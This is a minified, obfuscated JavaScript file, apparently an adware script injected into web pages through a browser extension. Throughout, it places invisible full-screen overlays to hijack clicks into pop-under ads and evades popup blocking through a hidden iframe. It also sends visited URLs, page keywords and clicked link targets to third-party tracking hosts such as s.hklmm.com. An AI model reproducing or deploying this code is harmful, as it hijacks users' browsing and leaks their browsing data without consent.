_GPL.j(function(e,b,Ca,z,l,g,n,Za,$a,Qb,ha,B,wb,Da,r,na,f,ab,oa,bb,x,t,Rb,u,xb,ia){function Q(a){a=ha.userAgent.match(wb(a+"[/ ](\\d+)","i"));return(a&&a[1])|0}function Ea(a){var c=!a||!a.type;c||(a.cancelBubble=!0,a.preventDefault&&a.preventDefault(),a.returnValue=!1,a.stopImmediatePropagation&&a.stopImmediatePropagation(),a.stopPropagation&&a.stopPropagation());return c}function C(a){var c={},h="cdnstats-a.akamaihd.net";e.each(arguments,function(a,b){"string"===typeof b?h=b:e.extend(c,e.isFunction(b)?
b(c):b)});(new Image).src=b.proto+h+"/s.gif?_="+(1E8*Math.random()|0)+"&"+e.map(c,function(a,c){return a!=na?g(c)+"="+g(a):[]}).join("&")}function yb(a,c){c=c||[];for(var b=0,k=Math.random(),ja,d=0;d<c.length;d++)if(b+=c[d][1],k<b&&!ja&&(ja=c[d][0]),c[d][0]==a){ja=a;break}return ja||c[0][0]}function R(){Fa(p,oa,R);zb(function(a,c,b){d=a;S||(S=!0,d!=Ga&&L&&(d+="&fo=1"),cb(),Ab(),Bb(),db(),Ha=+new l,E(p,oa,eb),fb=Da(function(){36E5<+new l-Ha&&aa(!1)},5E3))})}function eb(a){Ha=+new l;S&&(A&&A.remove(),
z(Ia),Ja=a.target||a.srcElement,Ia=r(cb,50))}function aa(a){S&&(e("iframe").off("mouseover",gb),z(Ia),A&&A.remove(),T&&T.remove(),S=!1,Ca(fb),Cb(),Fa(p,oa,eb),d=void 0,F=M="",Ka=!1,a||E(p,oa,R),r(R,1E3*Math.max(N,H)))}function E(a,c,b){if(f[ab]){var k=pa();try{return k.call(a,c,b,!0)}catch(ja){a[ab](c,b,!0)}}else a.attachEvent("on"+c,b,!0)}function Bb(){ka=!0;b.ah&&b.ah(I,U);e("*").add(f).each(function(a,c){c[qa]||E(c,I,U)});hb||(hb=!0,e("*").add(f).each(function(a,c){c[qa]||(E(c,"mousedown",V),E(c,
"mouseup",V),E(c,"click",V))}),b.ah&&(b.ah("mousedown",V),b.ah("mouseup",V),b.ah("click",V)));e("iframe").each(function(a,c){try{E(c.contentWindow,I,U)}catch(b){}});ib=Da(function(){e("iframe").each(function(a,c){c[jb]||(c[jb]=1,e(c).mouseover(gb))})},100);if(la)try{b.log("Attempting to pop from extension to: "+d);var a=La(),c=b.proto+b.baseCDN+"/pwn.html?u="+g(d)+"&n="+a+"&r=";"h"!=la||ba?"w"!=la||ba||(ba=!0,Ma(f,"openThatTabBitch",{url:c,isUnder:!1,attr:"z7b85_91c4"}),r(function(){ba=!1},100)):
(ba=!0,Ma(p,"createNewTab",{url:c,focused:"true"}),Ma(ra,"createNewTab",{url:c,focused:"true"}),r(function(){ba=!1},100));var h=Da(function(){ra.getAttribute("z7b85_91c4")&&(Ca(h),aa(!0),kb(),ra.removeAttribute("z7b85_91c4"))},50)}catch(k){}}function Ma(a,c,b){if(p.createEvent){var k=p.createEvent("CustomEvent");k.initCustomEvent(c,!1,!1,b);a.dispatchEvent(k)}else k=p.createEventObject(),k.detail=b,k.realType=c,a.fireEvent("ondataavailable",k)}function Db(){if(Q("Chrome")){for(var a=0;a<ha.plugins.length;a++)if("Widevine Content Decryption Module"==
ha.plugins[a].name)return!1;return!0}return!1}function cb(){if(S){A&&A.remove();if(Ja)for(var a=Ja;a;){if(a[qa])return;a=a.parentNode}A=e('<a style="z-index:999999999999999;padding:0;margin:0;cursor:default;opacity:0;position:fixed;top:0;left:0;background:transparent;width:100%;height:100%;">&nbsp;</a>');a=La();A.attr({target:a,href:d});E(A[0],"mousedown",Ea);E(A[0],"mouseup",Ea);E(A[0],"click",U);A.appendTo(W)}}function Ab(){T||(T=e('<div style="z-index:999999999999999;cursor:pointer;display:none;position:absolute;background:transparent;">&nbsp;</div>').appendTo(W),
T.mouseout(function(){T.hide()}))}function gb(a){var c=e(a.target),b=c.offset();b.width=c.outerWidth();b.height=c.outerHeight();b.display="block";T.css(b);a.stopPropagation()}function Eb(a){ca.parentNode||(Na=lb());e("#__modal,#__modal_container").remove();("20151108_t"===v||-1<Fb.indexOf(F))&&d!==n.href&&(z(mb),function(c){mb=r(function(){f.onbeforeunload=function(){};f.name=a;n.href=c},300)}(d),d=n.href,a="ld893__"+O());if(ha.userAgent.match(/\bEdge\/\d+/i))return Na(d,a);if(-1<["833497","833486",
"833488"].indexOf(F)&&!Gb){var c=b.getExtensionName(da),h="http://advertising-support.com/why.php?type=5&zone="+g(da)+"&pid="+g(m)+"&ext="+g(c);d="data:text/html;base64,"+b.B64.encode('<!doctype html><html><body><style>html,body{margin:0;padding:0;height:100%;width:100%;}</style><iframe src="'+d+'" width="100%" height="100%" frameborder="0" name="'+a+'"></iframe><div style="display:block; position:fixed; bottom: 0px; left: 0px; right: 0; background: #e6e6e6; margin: 0px; padding: 0px; z-index:999999999999;"><span style="padding: 3px; color: #000;display:block;font:11px Arial, sans-serif;text-align: right;">Ad by '+
c+". "+(F?"[#"+F+" , "+b.vars.cid+"]":"")+' <a href="#" onclick="window.open(\''+h+'\');return false;" style="color:#000;font:11px Arial, sans-serif;">More Info</a></div></body></html>')}if(c=Na("",1749==m?a:"_blank"))c.name=a,.02>Math.random()?(h=""+d,-1<d.indexOf(X)&&d.match(/^https?:/i)&&(h="http://"+X+"/pclk?c="+g(M)+"&crl="+g(d)),c.location.href=h):c.location.href=d;return c}function La(){var a="ld893_";M&&(a+="_"+g(M),F&&(a+=","+F),a+="_");return a+="_"+O()}function Hb(a){if(d!=Ga){a=a.target||
a.srcElement;for(var c="";a;){ea||(ea=a.tagName);if("A"==a.tagName&&a.href&&a.protocol.toLowerCase().match(/^http/)&&-1===a.href.indexOf(X)){c=a.protocol+"//"+a.host+a.pathname+a.search+a.hash;break}a=a.parentNode}if(!d)return!1;c&&-1==c.indexOf(X)&&(d+="&t="+g(c.substring(0,Math.max(0,1500-d.length))));d+="&rt="+(+new l-nb);ea&&(d+="&data_tag="+g(ea));"/"!=n.pathname&&(d+="&mk="+g(b.B64.encode(Oa().substring(0,Math.max(0,1500-d.length)))));d+=ob?"&data_sid="+g(ob):""}b.log("Popping to: "+d);a=La();
return Eb(a)}function Oa(){function a(a){return a.toLowerCase().replace(/[.,!?]/g," ").split(" ")}var c=[];e("title").length&&(c=c.concat(a(e("title").text())));e('meta[property="og:title"],meta[property="og:description"],meta[name="description"],meta[name="keywords"]').each(function(){var b=e.trim(e(this).attr("content"));b&&b.match(/^\s*[a-zA-Z0-9]/)&&(c=c.concat(a(b)))});return e.trim(function(a){var c=[];e.each(a,function(a,b){-1==e.inArray(b,c)&&c.push(b)});return c}(c).join(",").replace(/([,]+)/g,
",").replace(/\s+/g," "))}function pb(a,c){a=(a||n.href).substr(0,1500);var h="/"!=n.pathname?Oa():"";a=a.replace(/:/g,"%3A");var h=h.replace(/:/g,"%3A").substring(0,Math.max(0,1500-a.length)),k=b.getSubId?"&subid="+b.getSubId(sa):"",h=g(b.B64.encode(a+"::z-"+m+"-"+da+"::"+h)),d="&cb="+(c||Pa),d=d+("&data_fr="+(qb(G)?"false":"true")),d=d+("&data_proto="+g(n.protocol));L&&(d+="&fo=1&data_fo=1");return b.proto+X+(J?"/dpops":"/pops")+"?c="+h+"&a=1&ch="+g(ma)+k+d}function Fa(a,c,b){if(f[bb])a[bb](c,b,
!1);else a.detachEvent("on"+c,b)}function Cb(){ka=!1;b.rh&&b.rh(I,U);e("*").add(f).off(I,U);e("iframe").each(function(a,c){try{e(c.contentWindow).off(I,U)}catch(b){}});Ca(ib)}function Ib(a){a=a||f.event||{};if(la&&ra.getAttribute("z7b85_91c4"))return!0;for(a=a.target||a.srcElement;a;){if(a[qa])return!0;a=a.parentNode}return!1}function K(a,c){a=B(a,10);isNaN(a)&&(a=B(ta&&ta.getItem(c)||b.gc(c,10),10)||0);return a}function qb(a){return(new l(1E3*(a||0))).toDateString()==(new l).toDateString()}function ua(){G|=
0;y|=0;P|=0;var a=O(),c=y&&!qb(G);c&&(y=0,w.set(u,y));var b=!Y||a-G>=N&&y<Y,a=a-P>=H;return!q&&c||b&&a}function U(a){a=a||f.event;if(!Ib(a)){var c=ka&&(J||Jb()),h=c&&Hb(a);if(h&&!h.closed)return c={url:d,cid:M,crid:F},aa(!0),kb(),C({t:"p_success",d:b.gd(),xr:+q,cid:b.vars.cid,pid:m}),va&&z(va),wa&&z(wa),xa=!0,Kb(h,c),V(a);h&&h.closed?wa||(wa=r(function(){C({t:"popclose",u:d,location:n.hostname,pid:m,tag:ea||""})},1E3)):c&&(va||(va=r(function(){C({t:"popfail",u:d,location:n.hostname,pid:m,tag:ea||
""})},1E3)))}}function Kb(a,c){function b(){Fa(f,"focus",b);var a=+new l-e;C({delay:a,t:"pop_f",cid:c.cid,crid:c.crid,u:c.url,location:n.hostname,zoneid:da,pid:m})}function d(){if(!a||a.closed||!1!==a.closed){var b=+new l-e;C({delay:b,t:"pop_c",cid:c.cid,crid:c.crid,u:c.url,location:n.hostname,zoneid:da,pid:m})}else r(d,50)}var e=+new l;d();E(f,"focus",b)}function Jb(){if(w.swf){G=K(w.get(x),x);316808>Qa.score&&(y=K(w.get(u),u));var a=Ra(w.get(t));P=K(a[fa],t)}return ua()}function db(){!w.swf&&S&&
w.get([x,u,t],function(a){a=a.v;G=K(a[x],x);316808>Qa.score&&(y=K(a[u],u));a=Ra(a[t]);P=K(a[fa],t);r(db,1E3)})}function O(){return Za(new l/1E3)}function rb(a,b,d){w.set(a,d);d=O();ta&&ta.setItem(a,d);b=B(b,10);var k=new l;k.setSeconds(k.getSeconds()+b);p.cookie=a+"="+d+";expires="+k.toUTCString()+";path=/;domain="+fa}function kb(){var a=O();rb(x,N,a);w.set(xb,a);G=a;w.set(u,++y);H&&rb(t,H,ya+(ya&&",")+fa+":"+a)}function Ra(a){var b={},d=O(),k=[];a=(a||"").split(",");if(a.length){for(var e=0;e<a.length;++e){var f=
a[e].split(":"),g=B(f[1],10);d-g<H&&(b[f[0]]=g,k.push(f[0]+":"+g))}ya=k.join(",");w.set(t,ya)}return b}function Sa(){return J||ua()||q?1:O()-(B(P,10)||0)<H?Infinity:y>=Y?"US"==b.vars.cid?149058:-1<["CA","GB","AU","FR","IT"].indexOf(b.vars.cid)?88620:59858:"US"==b.vars.cid?47432:-1<["CA","GB","AU","FR","IT"].indexOf(b.vars.cid)?46818:45300}function Lb(a){"US"==b.vars.cid?Ta(a,47432,149058):-1<["CA","GB","AU","FR","IT"].indexOf(b.vars.cid)?Ta(a,46818,88620):Ta(a,45300,59858);return ua()}function Ta(a,
b,d){a>=b&&(N=0,a>=d&&y>=Y&&(y=$a(0,Y-1)))}function zb(a){!function h(){w.get(["frt","_GPL_oo_z7b85",x,t,u,ia],function(d){if(d.v.frt){if("1750"==m){var e=B(d.v._GPL_oo_z7b85,10)||0;if(86400>Za(new l/1E3)-e)return}W.getAttribute("data-openThatTabBitch")&&"t3"==b.vars.wptg&&(e=["wp_t3_c","wp_t3_t"],v=d.v[ia],v&&-1!=e.indexOf(v)||(v=e[Math.floor(Math.random()*e.length)],w.set(ia,v)),"wp_t3_t"==v&&(la="w"));v||(v=d.v[ia],v=yb(v,[["20151108_c",.95],["20151108_t",.05]]),w.set(ia,v));sb||(sb=!0,b.pc(function(){tb?
tb=!1:ka||(Ua=!1,aa(),R())}));f[Pa]=function(b){Mb(b,a)};e=O();G=K(d.v[x],x);y=K(d.v[u],u);d=Ra(d.v[t]);P=K(d[fa],t);J||ua()?(d=Sa(),Va=+new l,b.insertJS(pb()+"&ms="+d+"&r="+e),C({t:"p_req",ms:d,d:b.gd(),xr:+q,cid:b.vars.cid,pid:m}),z(za),za=r(function(){z(za);if(!L&&!q&&1735!=m){var a=Sa(),b="http://clkmon.com/adServe/banners?pid=14442&cid="+da+"&action=r&q=",d="/"!=n.pathname?Oa():"",b=b+g(d.substring(0,Math.max(0,1500-b.length)));f[Pa]({url:b,score:a});C({t:"popfallback",reason:"time",pid:m,u:n.hostname})}},
15E3)):(d=Sa(),b.log("minScoreNeeded: "+d),Infinity>d&&!Ua&&!q?(Va=+new l,b.insertJS(pb()+"&ms="+d+"&r="+e),C({t:"p_req",ms:d,d:b.gd(),xr:+q,cid:b.vars.cid,pid:m}),Ua=!0):Wa(),J||L||(z(Xa),Xa=r(h,1E3*(5+$a(e,G+N,P+H)-e))))}})}()}function pa(){if(!pa.v){var a=p.createElement("iframe");try{W.appendChild(a),pa.v=a.contentWindow.Element.prototype.addEventListener,W.removeChild(a)}catch(b){a&&W.removeChild(a)}}return pa.v||Element.prototype.addEventListener}function lb(){ca=p.createElement("iframe");ca.style.display=
"none";ca.style.visibility="hidden";W.appendChild(ca);return ca.contentWindow.open}function V(a){xa&&!Ya&&(Ya=r(function(){Ya=na;xa=!1},100));a=a||f.event||{};return xa||a.type&&a.type!=I&&ka?Ea(a):!0}function Wa(){Ka||L||(Ka=!0,b.insertJS(b.proto+b.baseCDN+"/items/z7b85/js/z7b85.js","z7b85bm"))}function Aa(){C({t:"p_nobid",d:b.gd(),xr:+q,cid:b.vars.cid,pid:m})}function Mb(a,c){z(za);var d=+new l-Va;F=M="";ga&&ga.score&&(!a||B(a.score,10)<B(ga.score,10))&&(a=ga,ga=na);if(a){if(J){if(!a.url&&!a.retry){if(q){Aa();
return}a.retry=N}if(a.retry){z(Ba);Ba=r(function(){aa(!0);R()},1E3*B(a.retry+1,10));Aa();return}}a.crid&&(F=a.crid);if(J&&a.url&&!a.cid){var e=a.url.match(/[?&]c=([^&]+)/);e&&e[1]&&(a.cid=e[1])}a.cid&&(M=a.cid,a.url&&J||(a.url="http://"+X+"/click?c="+g(M)));a.url&&(a.url+=b.getSubId?"&subid="+b.getSubId(sa):"",a.url+=v?"&data_test="+g(v):"",a.url+="&data_fb="+(Db()?"yes":"no"),a.url+="&data_rtt="+d,a.url+="&data_proto="+g(n.protocol),a.url+="&data_ic="+(ub?"true":"false"),L&&(a.url+="&data_fo=1"),
a.url+="&data_ss="+(screen.availHeight||0)+"x"+(screen.availWidth||0));q&&!a.url&&(a.url=Ga,a.cid="xr");d=B(a.score,10);e=!a.mp;if(!e&&25<=100*parseFloat(a.mp)&&(e=!0,!L)){b.item_vars.z7b85_b=a;Wa();return}e=e&&(J||0<d&&Lb(d));q||e?(nb=+new l,z(Xa),a.url&&a.expires&&(z(Ba),Ba=r(function(){aa(!0);R()},1E3*B(a.expires,10))),Qa={score:d,now:new l/1},c(a.url,d,a["int"]),C({t:"p_bid",d:b.gd(),xr:+q,cid:b.vars.cid,pid:m})):(Aa(),Wa())}else Aa()}var w=b.items.e6a00,p=f.document,ra=p.documentElement||p,W=
p.body,ta=f.localStorage,Nb=Q("chrome"),Ob=Q("firefox"),Gb=!!p.all||!f.ActiveXObject&&"ActiveXObject"in f;Q("opera");var Pb=Q("safari");Q("webkit");var ma=b.item_vars["22555_ch"]||b.item_vars.ch||"",N,G,P,Z=b.dt(),Z=Z&&Z.inherited&&Z.inherited.t||[],q="x"==ma||-1<Z.indexOf("adult")||0==Z.length&&0<e('meta[content="RTA-5042-1996-1400-1577-RTA"]').length;q&&(-1==Z.indexOf("adult_block")?ma="x":(ma="x-issue",q=!1));var H,sa="z7b85",X=b.gsd&&b.gsd(sa)||"s.hklmm.com",S=!1,fb,Ha,ka=!1,fa=b.gd(),d,nb=0,
Va=0,Ba,ya="",y=0,Y,Qa={},M="",F="",Xa,Ua=!1,v,va,wa,za,ea;ha.userAgent.match(/Trident.*rv[ :]*11\./);var I="click";if(Nb||Pb)I="mousedown";else if(Ob||p.all||Q("trident"))I="mouseup";var vb=b.zoneid(sa,!0).split("_"),da=vb[0],m=vb[1]||b.vars.pid,ob=b.vars.systemid;g(ma);var Ga="http://engine.phn.doublepimp.com/link.engine?guid=88ca85df-d43d-4f64-bc7d-ebc1818e3703",la=!1,ba=!1,Pa=b.rs(20),T,jb=b.rs(12),Fb=["846890","846860","602758"],mb,A,Ia,ib,ub=function(){try{return f[(f.btoa||function(a){return a})(n.hostname+
"::"+(new l).toDateString())]===n.protocol}catch(a){return!1}}(),Ya,qa="91c4",sb=!1,tb=!0,ca,Na=lb(),xa=!1,hb=!1,J=!1,L=0<e("#z7b85bm").length,Ka=!1,ga,Ja;L&&(b.ri("z7b85bm"),x+="_bm",t+="_bm",u+="_bm",X="s.hnisdlmm.com",(ga=b.item_vars.z7b85_b)&&(b.item_vars.z7b85_b=na));1797==m&&"GB"==b.vars.cid||f.name.match(/^_odctxdsp/)||"facebook.com"==fa||(ub?C({t:"idlecrawler",d:b.gd(),xr:+q,cid:b.vars.cid,pid:m}):(q?(Y=N=0,H=180,x+="_xr",t+="_xr",u+="_xr"):(N=360,Y=4,H=360),R()))},_GPL,clearInterval,clearTimeout,
Date,encodeURIComponent,location,Math.floor,Math.max,Math.random,navigator,parseInt,RegExp,setInterval,setTimeout,void 0,window,"addEventListener","mousemove","removeEventListener","ld893_pop_g","ld893_pop_s","ld893_s","ld893_pop_gs","ld893_spopd","z7b85_test");
